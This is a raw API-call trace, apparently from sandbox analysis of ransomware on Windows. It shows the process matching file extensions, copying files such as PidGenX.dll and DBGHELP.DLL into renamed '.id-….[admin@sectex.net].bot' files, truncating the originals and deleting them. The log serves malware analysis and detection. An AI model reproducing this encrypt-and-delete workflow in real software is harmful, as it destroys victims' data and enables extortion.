	[0050.131] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1
	[0050.131] lstrlenW (lpString=".pdf") returned 4
	[0050.131] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0050.131] lstrlenW (lpString=".xls") returned 4
	[0050.131] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0050.131] lstrlenW (lpString=".xlsx") returned 5
	[0050.131] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1
	[0050.131] lstrlenW (lpString=".ppt") returned 4
	[0050.132] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0050.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0050.132] lstrlenW (lpString=".zip") returned 4
	[0050.132] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0050.132] lstrlenW (lpString=".rar") returned 4
	[0050.132] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0050.132] lstrlenW (lpString=".bz2") returned 4
	[0050.132] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0050.132] lstrlenW (lpString=".7z") returned 3
	[0050.132] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0050.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0050.132] lstrlenW (lpString=".dbf") returned 4
	[0050.132] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0050.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0050.132] lstrlenW (lpString=".1cd") returned 4
	[0050.132] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0050.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0050.132] lstrlenW (lpString=".jpg") returned 4
	[0050.132] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0050.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0050.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0050.132] lstrlenW (lpString=".doc") returned 4
	[0050.132] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0050.132] lstrlenW (lpString=".docx") returned 5
	[0050.132] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1
	[0050.132] lstrlenW (lpString=".pdf") returned 4
	[0050.132] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0050.132] lstrlenW (lpString=".xls") returned 4
	[0050.132] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0050.132] lstrlenW (lpString=".xlsx") returned 5
	[0050.132] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1
	[0050.132] lstrlenW (lpString=".ppt") returned 4
	[0050.132] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0050.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0050.133] lstrlenW (lpString=".zip") returned 4
	[0050.133] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0050.133] lstrlenW (lpString=".rar") returned 4
	[0050.133] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0050.133] lstrlenW (lpString=".bz2") returned 4
	[0050.133] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0050.133] lstrlenW (lpString=".7z") returned 3
	[0050.133] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0050.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0050.133] lstrlenW (lpString=".dbf") returned 4
	[0050.133] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0050.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0050.133] lstrlenW (lpString=".1cd") returned 4
	[0050.133] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0050.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0050.133] lstrlenW (lpString=".jpg") returned 4
	[0050.133] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0050.133] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0050.133] lstrlenW (lpString="PidGenX.dll") returned 11
	[0050.133] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0050.134] GetFileSizeEx (in: hFile=0x194, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=1463568) returned 1
	[0050.134] CloseHandle (hObject=0x194) returned 1
	[0050.134] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020
	[0050.134] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.134] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0050.134] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.134] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.134] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.134] GetLastError () returned 0x0
	[0050.134] ReadFile (in: hFile=0x194, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0050.156] WriteFile (in: hFile=0x184, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0050.349] ReadFile (in: hFile=0x194, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x65520, lpOverlapped=0x0) returned 1
	[0050.363] WriteFile (in: hFile=0x184, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0x65530, lpOverlapped=0x0) returned 1
	[0050.372] ReadFile (in: hFile=0x194, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0050.372] WriteFile (in: hFile=0x184, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0050.372] SetEndOfFile (hFile=0x184) returned 1
	[0050.372] CloseHandle (hObject=0x184) returned 1
	[0050.372] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.372] SetEndOfFile (hFile=0x194) returned 1
	[0050.376] CloseHandle (hObject=0x194) returned 1
	[0050.376] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0050.377] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1
	[0050.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0050.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0050.713] lstrlenW (lpString=".doc") returned 4
	[0050.713] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0050.713] lstrlenW (lpString=".docx") returned 5
	[0050.714] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1
	[0050.714] lstrlenW (lpString=".pdf") returned 4
	[0050.714] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0050.714] lstrlenW (lpString=".xls") returned 4
	[0050.714] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0050.714] lstrlenW (lpString=".xlsx") returned 5
	[0050.714] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1
	[0050.714] lstrlenW (lpString=".ppt") returned 4
	[0050.714] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0050.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0050.714] lstrlenW (lpString=".zip") returned 4
	[0050.714] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0050.714] lstrlenW (lpString=".rar") returned 4
	[0050.714] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0050.714] lstrlenW (lpString=".bz2") returned 4
	[0050.714] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0050.714] lstrlenW (lpString=".7z") returned 3
	[0050.714] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0050.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0050.714] lstrlenW (lpString=".dbf") returned 4
	[0050.714] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0050.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0050.714] lstrlenW (lpString=".1cd") returned 4
	[0050.714] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0050.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0050.714] lstrlenW (lpString=".jpg") returned 4
	[0050.714] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0050.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0050.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0050.714] lstrlenW (lpString=".doc") returned 4
	[0050.714] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0050.714] lstrlenW (lpString=".docx") returned 5
	[0050.714] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1
	[0050.714] lstrlenW (lpString=".pdf") returned 4
	[0050.714] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0050.715] lstrlenW (lpString=".xls") returned 4
	[0050.715] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0050.715] lstrlenW (lpString=".xlsx") returned 5
	[0050.715] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1
	[0050.715] lstrlenW (lpString=".ppt") returned 4
	[0050.715] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0050.715] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0050.715] lstrlenW (lpString=".zip") returned 4
	[0050.715] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0050.715] lstrlenW (lpString=".rar") returned 4
	[0050.715] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0050.715] lstrlenW (lpString=".bz2") returned 4
	[0050.715] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0050.715] lstrlenW (lpString=".7z") returned 3
	[0050.715] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0050.715] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0050.715] lstrlenW (lpString=".dbf") returned 4
	[0050.715] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0050.715] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0050.715] lstrlenW (lpString=".1cd") returned 4
	[0050.715] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0050.715] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74
	[0050.715] lstrlenW (lpString=".jpg") returned 4
	[0050.715] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0050.715] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0050.715] lstrlenW (lpString="DBGHELP.DLL") returned 11
	[0050.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0052.142] GetFileSizeEx (in: hFile=0x204, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=1369952) returned 1
	[0052.142] CloseHandle (hObject=0x204) returned 1
	[0052.144] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll")) returned 0x20
	[0052.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0052.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0052.145] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.145] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0052.145] GetLastError () returned 0x0
	[0052.145] ReadFile (in: hFile=0x204, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0052.170] WriteFile (in: hFile=0x184, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0052.331] ReadFile (in: hFile=0x204, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x4e770, lpOverlapped=0x0) returned 1
	[0052.343] WriteFile (in: hFile=0x184, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0x4e780, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0x4e780, lpOverlapped=0x0) returned 1
	[0052.352] ReadFile (in: hFile=0x204, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0052.352] WriteFile (in: hFile=0x184, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0052.352] SetEndOfFile (hFile=0x184) returned 1
	[0052.352] CloseHandle (hObject=0x184) returned 1
	[0052.353] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.353] SetEndOfFile (hFile=0x204) returned 1
	[0052.356] CloseHandle (hObject=0x204) returned 1
	[0052.356] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0052.356] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll")) returned 1
	[0052.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61
	[0052.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61
	[0052.356] lstrlenW (lpString=".doc") returned 4
	[0052.356] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0052.356] lstrlenW (lpString=".docx") returned 5
	[0052.356] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1
	[0052.356] lstrlenW (lpString=".pdf") returned 4
	[0052.356] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0052.356] lstrlenW (lpString=".xls") returned 4
	[0052.356] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0052.357] lstrlenW (lpString=".xlsx") returned 5
	[0052.357] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1
	[0052.357] lstrlenW (lpString=".ppt") returned 4
	[0052.357] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0052.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61
	[0052.357] lstrlenW (lpString=".zip") returned 4
	[0052.357] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0052.357] lstrlenW (lpString=".rar") returned 4
	[0052.357] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0052.357] lstrlenW (lpString=".bz2") returned 4
	[0052.357] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0052.357] lstrlenW (lpString=".7z") returned 3
	[0052.357] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0052.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61
	[0052.357] lstrlenW (lpString=".dbf") returned 4
	[0052.357] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0052.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61
	[0052.357] lstrlenW (lpString=".1cd") returned 4
	[0052.357] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0052.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61
	[0052.357] lstrlenW (lpString=".jpg") returned 4
	[0052.357] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0052.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61
	[0052.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61
	[0052.357] lstrlenW (lpString=".doc") returned 4
	[0052.357] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0052.357] lstrlenW (lpString=".docx") returned 5
	[0052.357] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1
	[0052.357] lstrlenW (lpString=".pdf") returned 4
	[0052.357] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0052.357] lstrlenW (lpString=".xls") returned 4
	[0052.357] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0052.357] lstrlenW (lpString=".xlsx") returned 5
	[0052.357] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1
	[0052.358] lstrlenW (lpString=".ppt") returned 4
	[0052.358] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0052.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61
	[0052.358] lstrlenW (lpString=".zip") returned 4
	[0052.358] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0052.358] lstrlenW (lpString=".rar") returned 4
	[0052.358] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0052.358] lstrlenW (lpString=".bz2") returned 4
	[0052.358] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0052.358] lstrlenW (lpString=".7z") returned 3
	[0052.358] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0052.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61
	[0052.358] lstrlenW (lpString=".dbf") returned 4
	[0052.358] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0052.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61
	[0052.358] lstrlenW (lpString=".1cd") returned 4
	[0052.358] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0052.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61
	[0052.358] lstrlenW (lpString=".jpg") returned 4
	[0052.358] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0052.358] lstrcmpiW (lpString1=".FLT", lpString2=".bot") returned 1
	[0052.358] lstrlenW (lpString="GIFIMP32.FLT") returned 12
	[0052.358] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0053.673] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=320384) returned 1
	[0053.673] CloseHandle (hObject=0x1a8) returned 1
	[0053.673] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt")) returned 0x20
	[0053.673] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0053.673] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.673] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.674] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0054.769] GetLastError () returned 0x0
	[0054.769] ReadFile (in: hFile=0x1a8, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x4e380, lpOverlapped=0x0) returned 1
	[0054.778] WriteFile (in: hFile=0x188, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0x4e390, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0x4e390, lpOverlapped=0x0) returned 1
	[0054.787] ReadFile (in: hFile=0x1a8, lpBuffer=0xae90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2dfed4, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesRead=0xa2dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0054.787] WriteFile (in: hFile=0x188, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0054.788] SetEndOfFile (hFile=0x188) returned 1
	[0054.788] CloseHandle (hObject=0x188) returned 1
